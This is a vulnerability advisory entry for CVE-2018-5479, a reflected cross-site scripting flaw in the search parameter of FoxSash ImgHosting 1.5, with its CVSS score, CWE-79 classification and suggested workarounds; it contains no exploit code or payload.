PT-2018-16984 · Foxsash · Foxsash Imghosting

Dennis Veninga

Published

2018-01-15

Updated

2018-02-05

CVE-2018-5479

CVSS v3.1

6.1

Medium

Vector

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Name of the Vulnerable Software and Affected Versions FoxSash ImgHosting version 1.5

Description The issue allows for XSS attacks, specifically through the search engine function via the search parameter to the default URI. This could enable attackers to steal user and admin sessions by sending infected URLs, which would execute malicious code.

Recommendations For FoxSash ImgHosting version 1.5, as a temporary workaround, consider disabling the search function until a patch is available. Restrict access to the user/admin login interface to minimize the risk of session theft. Avoid using the search parameter in the affected URI until the issue is resolved.

Exploit

Fix

XSS

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-79

Related Identifiers

CVE-2018-5479

Affected Products

Foxsash Imghosting

PT-2018-16984 · Foxsash · Foxsash Imghosting

CVE-2018-5479

Weakness Enumeration

Related Identifiers

Affected Products

References · 3